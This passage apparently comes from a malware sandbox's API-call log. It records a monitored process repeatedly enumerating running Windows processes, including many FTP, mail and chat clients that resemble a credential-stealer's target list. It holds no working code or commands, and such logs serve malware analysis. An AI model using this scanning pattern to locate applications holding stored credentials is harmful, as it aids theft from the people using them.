th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0281.687] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0281.688] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0281.690] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0281.691] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0281.693] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0281.695] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0281.696] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0281.698] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0281.700] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0281.704] Process32Next (in: hSnapshot=0x2134, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0281.705] CloseHandle (hObject=0x2134) returned 1 [0281.705] Sleep (dwMilliseconds=0x64) [0281.819] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2170 [0281.834] Process32First (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0281.836] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0281.838] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0281.844] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0281.846] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0281.848] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0281.850] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0281.852] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0281.854] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0281.856] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.861] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.863] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0281.864] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.866] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.868] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.870] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.892] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.894] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.896] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.898] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0281.900] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0281.901] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0281.907] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.909] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0281.911] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0281.912] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0281.914] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0281.915] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0281.916] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0281.918] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0281.919] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0281.921] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0281.922] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0281.923] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0281.925] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0281.926] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0281.928] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0281.929] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0281.930] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0281.932] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0281.933] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0281.934] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0281.936] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0281.937] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0281.939] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0281.940] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0281.941] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0281.943] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0281.944] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0281.945] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0281.947] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0281.948] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0281.949] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0281.951] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0281.952] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0281.954] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0281.955] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0281.956] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0281.958] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0281.960] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0281.961] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0281.963] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0281.964] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xee4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0281.966] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xef8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0281.968] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0281.969] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0281.971] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0281.973] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0281.974] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0281.976] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0281.978] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0281.979] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0281.981] Process32Next (in: hSnapshot=0x2170, lppe=0x1046fe20 | out: 